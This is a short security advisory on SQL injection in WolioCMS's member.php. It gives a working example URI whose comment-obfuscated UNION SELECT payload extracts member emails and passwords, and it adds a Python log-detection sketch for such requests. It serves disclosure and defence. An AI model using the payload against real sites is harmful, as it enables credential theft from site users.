WolioCMS Multiple SQL Injection Vulnerabilities

Attackers can use a browser to exploit these issues.

The following example URI is available:

http://www.example.com/_woliocms/member.php?member=admin&act=page&id='/**/UNION/**/ALL/**/SELECT/**/null,null,concat(member_email,'-',member_password),null,null,null,null,null,null,null/**/FROM/**/member/*
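For defenders reviewing web logs, the URI above uses `/**/` comments in place of spaces, so a signature that looks for the literal text "union select" does not match it. The following detection sketch is an added example, not part of the original advisory or of WolioCMS; the sample request lines are constructed, and the function names are hypothetical.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote_plus

# Constructed request targets as they would appear in an access log.
# The second is the query from the advisory's example URI.
SAMPLE_REQUESTS = [
    "/_woliocms/member.php?member=admin&act=page&id=12",
    "/_woliocms/member.php?member=admin&act=page&id='/**/UNION/**/ALL/**/SELECT/**/"
    "null,null,concat(member_email,'-',member_password),null,null,null,null,null,"
    "null,null/**/FROM/**/member/*",
    "/_woliocms/member.php?member=admin&act=page"
    "&id=%27%2F%2A%2A%2FuNiOn%2F%2A%2A%2FSeLeCt%2F%2A%2A%2F1",
    "/_woliocms/member.php?member=union&act=page&id=7",
]

# Comment delimiters are replaced by spaces so that keywords separated by
# comments (or wrapped inside them) line up as ordinary space-separated tokens.
COMMENT_DELIMS = re.compile(r"/\*!?\d*|\*/")
UNION_SELECT = re.compile(r"\bunion\s+(?:all\s+|distinct\s+)?select\b")


def naive_match(request_target):
    """Literal signature on the raw request; shown only for comparison."""
    return "union select" in request_target.lower()


def normalize(value):
    """Decode once more (double encoding), drop comment delimiters, fold case."""
    value = unquote_plus(value)
    value = COMMENT_DELIMS.sub(" ", value)
    return re.sub(r"\s+", " ", value).lower()


def suspicious_params(request_target):
    """Return the names of query parameters carrying a UNION ... SELECT."""
    params = parse_qs(urlsplit(request_target).query, keep_blank_values=True)
    return [
        name
        for name, values in params.items()
        if any(UNION_SELECT.search(normalize(v)) for v in values)
    ]


if __name__ == "__main__":
    for req in SAMPLE_REQUESTS:
        print(naive_match(req), suspicious_params(req), req[:60])
```

A match identifies requests to review; it does not replace fixing the query handling in the application.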

Sample exploit code is also available:


 

Copyright 2010, SecurityFocus